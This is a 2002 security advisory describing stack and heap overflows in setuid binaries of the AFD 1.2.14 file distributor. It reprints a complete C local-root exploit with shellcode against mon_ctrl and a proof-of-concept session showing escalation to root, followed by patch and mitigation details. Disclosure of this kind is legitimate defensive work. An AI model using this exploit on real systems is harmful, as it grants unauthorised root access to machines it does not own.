


AFD multiple local root exploits via stack and heap overflows



9th Sep 2002 [SBWID-5677]
COMMAND

	
		AFD multiple local root exploits via stack and heap overflows
	
	

SYSTEMS AFFECTED

	
		This vulnerability was discovered in the AFD 1.2.14 package, but earlier
		versions are probably vulnerable too. Of the platforms listed below only
		Linux was actually tested; the others are marked as untested guesses.
		

			version				vulnerable		exploitable

		

			* Linux 1.3.x  -  2.4.x		YES			YES

			* Solaris 2.x			probably (not tested)	probably (not tested)

			* HP-UX 10.x  -  11.x		probably (not tested)	probably (not tested)

			* IRIX 5.3  6.x			probably (not tested)	probably (not tested)

			* AIX 4.3			probably (not tested)	probably (not tested)

			* FTX 3.0.x  3.2.x		probably (not tested)	probably (not tested)

			* SCO OpenServer Release 5	probably (not tested)	probably (not tested)

		
	
	

PROBLEM

	
		From the Netric Security Team advisory (http://www.netric.org,
		http://www.netric.be):
		

		 Description

		

		The Automatic File Distributor provides a framework for  very  flexible,
		non-stop, log and debug-able delivery of an arbitrary  amount  of  files
		to multiple recipients as expressed in URLs.
		

		The AFD package comes with several programs that, once compiled and
		installed, are setuid root by default.
		

		Among other vulnerabilities: at the start of most of these programs a
		working directory is required. It can be supplied with a command-line
		switch (-w) or with an environment variable, and in most of them the
		code that handles it looks like this:
		

			#define MON_WD_ENV_NAME          "MON_WORK_DIR"  /* Environment variable */

			#define WD_ENV_NAME              "AFD_WORK_DIR"  /* The working dir-   */

			...

			/* work_dir is global in some sources, local in other sources */

			char  work_dir[MAX_PATH_LENGTH];

			...

		

			int

			main(int argc, char *argv[])

			{

				...

				/* work_dir is global in some sources, local in other sources */

				char  work_dir[MAX_PATH_LENGTH];

				...

				/* might call some other function that then calls this function */

				if (get_XXX_path(&argc, argv, work_dir) < 0)

				{

					exit(INCORRECT);

				}

				...

			}

		

			/* the XXX is either 'mon' or 'afd' */

			/* this function is in another file then main() is */

			get_XXX_path(int *argc, char *argv[], char *work_dir)

			{

				...

				char *ptr;

		

				/* Check if the environment variable is set */

				/* if ((ptr = getenv(MON_WD_ENV_NAME)) != NULL) <-- can also be this */

				if ((ptr = getenv(WD_ENV_NAME)) != NULL)

				{

					/* !!!!! THIS IS WHERE ALL THE ACTION TAKES PLACE !!!!! */

					(void)strcpy(work_dir, ptr);

				}

				...

			}

		

		As the code shows, strcpy() copies the environment value into work_dir
		with no length check, so a value longer than MAX_PATH_LENGTH overflows
		the buffer: a stack overflow when work_dir is a local, a heap overflow
		when it is global. With some of the binaries the same overflow can be
		triggered through the -w command-line switch; in the others the length
		of the -w argument is checked.
		

		The following table lists the vulnerable setuid binaries and whether
		each is exploitable through the environment variable and/or the -w
		command-line switch:
		

		        name		-w switch		env. var

			afd		NO			YES

			afdcmd		NO			YES

			afd_ctrl	NO			YES

			init_afd	NO			YES

			mafd		YES			YES

			mon_ctrl	YES			YES

			show_olog	NO			YES

			udc		NO			YES

		

		

		 Exploit

		

		The following exploit was tested in a lab and will probably not work
		without tweaking. It was tested against mon_ctrl from the AFD 1.2.14
		package on Red Hat 7.3.
		

		/* AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)

		 * (Bug found by Sacrine (sacrine@netric.org)

		 * -----------------------------------------------------------------

		 * usage: ./afd-expl [retloc] [ret]

		 * 

		 * This exploit overwrites a saved return address on the stack,
		 * so 0xbfffe360 (which worked for me on Red Hat 7.3) will
		 * probably not work for you...

		 *

		 * Just open the core dump, search the stack for 0x4207ac24,
		 * and subtract 0x0c from that address.

		 */

		

		#define _DEFAULT_SOURCE   /* putenv() is not declared under a strict -std= without this */

		#include <errno.h>

		#include <stdio.h>

		#include <stdlib.h>

		#include <string.h>

		#include <unistd.h>       /* execl() */

		

		char shellcode[] = 

		        "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */

		        "--netric--"

		        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"

		        "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"

		        "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

		

		

		int

		main(int argc, char *argv[])

		{

			char buffer[1135];

		

			unsigned int retloc     = 0xbfffe360;

			unsigned int ret        = 0x0806f020; /* &shellcode */

		

			if (argc > 1) retloc	= strtoul(argv[1], &argv[1], 16);

			if (argc > 2) ret	= strtoul(argv[2], &argv[2], 16);

		

			memset(buffer, 0x41, sizeof(buffer));

			memcpy(buffer, "MON_WORK_DIR=",13);

			memcpy(buffer+13, shellcode, strlen(shellcode));

		

			buffer[1117] = 0xff; /* prev_size */

			buffer[1118] = 0xff;

			buffer[1119] = 0xff;

			buffer[1120] = 0xff;

		

			buffer[1121] = 0xfc; /* size field */

			buffer[1122] = 0xff;

			buffer[1123] = 0xff;

			buffer[1124] = 0xff;

		

			buffer[1126] = (retloc & 0x000000ff); /* FD */

			buffer[1127] = (retloc & 0x0000ff00) >> 8;

			buffer[1128] = (retloc & 0x00ff0000) >> 16;

			buffer[1129] = (retloc & 0xff000000) >> 24;

		

			buffer[1130] = (ret & 0x000000ff); /* BK */

			buffer[1131] = (ret & 0x0000ff00) >> 8;

			buffer[1132] = (ret & 0x00ff0000) >> 16;

			buffer[1133] = (ret & 0xff000000) >> 24;

		

			buffer[1134] = 0x0;

			putenv(buffer);

		

			fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n");

			fprintf(stdout, "-----------------------------------------------------------------\n");

			fprintf(stdout, "Ret    = 0x%08x\n", ret);

			fprintf(stdout, "Retloc = 0x%08x\n", retloc);

		

			execl("/bin/mon_ctrl", "mon_ctrl", NULL);

			return 0;

		}

		

		

		 Proof of concept

		

			[eSDee@/ bin]$ id

			uid=502(eSDee) gid=500(trusted) groups=500(trusted)

			[eSDee@/ bin]$ ./afd-expl

			AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)

			-----------------------------------------------------------------

			Ret    = 0x0806f020

			Retloc = 0xbfffe360

			28 17:32:12 <E> Failed to create directory <Ű

			--netric--1█1╔¸Ń░F═Shn/shh//biŃRSß░

			                                  ═AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

							  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

							  AAAAAAAAAAAAAAAAAAAAAAAAA

			....

			ectory (check_dir.c 66)

			sh-2.05a# id

			uid=0(root) gid=500(trusted) groups=500(trusted)

			sh-2.05a# exit

		
	
	

SOLUTION

	
		A new version of AFD (1.2.15) has been released and can be downloaded
		from:
		

		 [source]  ftp://ftp.dwd.de/pub/afd/src-1.2.15.tar.bz2

		 [rpm   ]  ftp://ftp.dwd.de/pub/afd/rpm/afd-1.2.15-2.i386.rpm

		

		A patch against version 1.2.14 is also available. Both are served over
		plain FTP, so verify the download against a checksum or signature
		obtained from a second source. Until the fix is installed, the obvious
		interim mitigation is to strip the setuid bit from the binaries listed
		above (at the cost of whatever functionality depends on it), since the
		flaw is only a root escalation for users who can already run them:
		

		 [patch ]  ftp://ftp.dwd.de/pub/afd/patch-1.2.15.bz2

	

